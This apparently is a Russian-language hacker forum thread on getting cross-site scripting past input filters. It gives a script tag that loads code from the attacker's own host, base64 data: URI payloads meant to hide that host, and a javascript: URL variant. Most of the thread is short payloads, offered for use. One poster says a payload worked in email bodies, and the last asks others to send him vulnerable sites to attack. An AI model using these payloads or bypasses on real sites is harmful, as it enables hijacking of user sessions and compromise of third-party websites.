Блин хотел в скобках в названии топика написать XSS да забыл. Короче топик о XSS уязвимости. Короче. Когда много фильтров на вводимое содержимое - достаточно просто сделать хсс вида: Code: <script src=http://xakephost.com/js.js></script> - Использованные символы: <>:/= - Минус - мы палим хостинг. Чтобы не палить хостинг я придумал вот такой способ ща: Code: <script src=data:;base64,YWxlcnQoKTs=></script> - Использованные символы: <>.;: - Минус - арбайтает только в Опере. Может и в новых ИЕ и МФ тоже, я не тестил, но на старых не работает. Впринципе вот и вся суть поста :Д
называется самодостаточная ксс и мы о ней знали еще в 2006 году вобщем если интересно прочти описание и необязательно при этом способе сайт должен быть уязвим к ксске, впрочем прочти сам http://www.securitylab.ru/analytics/274302.php ну а ссылка выглядит приерно вот так data:text/html;base64,PHNjcmlwdD4gYWxlcnQoIlNlbGYtY29udGFpbmVkIFhTUyIpOyA8L3NjcmlwdD4= можеш вставить эту ссылку в адресную строку и проверить P.S. До недавнего времени прокатывала и в теле письма майла
Ну дак хсс через адресную строку это совсем другое дело. Проще написать яваскрипт:алерт(); и все. Только если фильтры блокируют ссылки на "яваскрипт:", то да. Кстати, если есть какие то сайты, на которых найдено ХСС, но она труднореализуема или интересно, подкиньте в личку, интересно попробовать, так как думаю способен.